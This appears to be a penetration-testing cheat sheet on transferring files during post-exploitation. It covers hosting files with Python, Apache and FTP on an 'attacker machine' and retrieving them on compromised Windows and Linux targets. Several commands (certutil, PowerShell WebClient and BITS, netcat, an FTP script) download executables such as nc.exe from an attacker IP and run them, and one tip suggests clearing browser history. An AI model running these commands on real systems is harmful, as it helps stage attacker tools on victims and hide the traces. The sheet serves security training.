Embedded Files
Non-Encrypted
Non-Encrypted
Attacker Machine (Linux) - Hosting
Attacker Machine (Linux) - Hosting
💡Tip: During lateral movement - if a compromised machine is already running a web server, copy the files over to the HTTP folder.
Python
Set up an HTTP server on the attacker machine within a specific (/root) directory.
The method uses the Python module SimpleHTTPServer, and has two minor downsides:
When you Ctrl+C to stop the server, it gives you a mess of errors, and
This isn’t the shortest command to set up a HTTP server
The main advantage of the python3 version is that we don’t get a mess of errors after stopping the server.
Apache
This is a longer method of setting up an HTTP server; it can be used in case Python or the respective modules are not available.
Move all the transfer files to the /var/www/html directory, and
Start the Apache2 service: `service apache2 start`
We can verify the server is running and serving the files by browsing our files via a web browser.
FTP
Python pyftpdlib:
Ensure the module is installed: sudo apt-get install python-pyftpdlib
Set up & run the FTP server (default port - 2121): python -m pyftpdlib [-p port]
Pure-ftpd:
Ensure the module is installed: sudo apt-get install pure-ftpd
Set up and run the FTP server: service pure-ftpd start
Verify the service is running: service pure-ftpd status
Shutdown the service: service pure-ftpd stop
Target Windows Machine - Retrieving Files
Target Windows Machine - Retrieving Files
💡Tip: Remote GUI access - use a browser to retrieve the file (clear the download & browser history).
CMD & PowerShell
Certutil: certutil -urlcache -split -f http://<attacker_ip>:<port>/file_to_download.ext [output_file.ext]
PowerShell - Installed in Windows 7 and Server 2008+; use single quotes for the URL and out_file.ext (double quotes will not work):
powershell -c (New-Object Net.WebClient).DownloadFile(’http://<attacker_ip>:<port>/file_to_download.ext’, ‘output_file.ext’)
powershell.exe -c (Start-BitsTransfer -Source "http://<attacker_ip>:<port>/file_to_download.ext -Destination C:\temp\nc.exe")
powershell.exe wget "http://<attacker_ip>:<port>/file_to_download.ext" -outfile "c:\temp\nc.exe"
VBScript
Create and save the following VBScript and execute this command:
cscript wget.vbs http://<attacker_ip>:<port>/file_to_download.ext
Target Linux Machine - Retrieving Files
Target Linux Machine - Retrieving Files
Netcat
Netcat can also be used to manually download files from an HTTP server; direct the download output to a file, & use sed to delete the first 7 lines of the file (the HTTP GET response header).
echo "GET /file HTTP/1.0" | nc -n <attacker_ip>:<port> > out-file && sed -i '1,7d' out-file
FTP Hosting
Create a file (right) with all the FTP commands required and run them all at once:
Create a connection to the attacker-FTP server.
Specify the username & password
Enable transfer of binary execution files (optional)
GET the executable file, and
Close the connection
Execute the file (on Windows target machine): ftp -v -n -s:ftp.txt
Page updated
Google Sites
Report abuse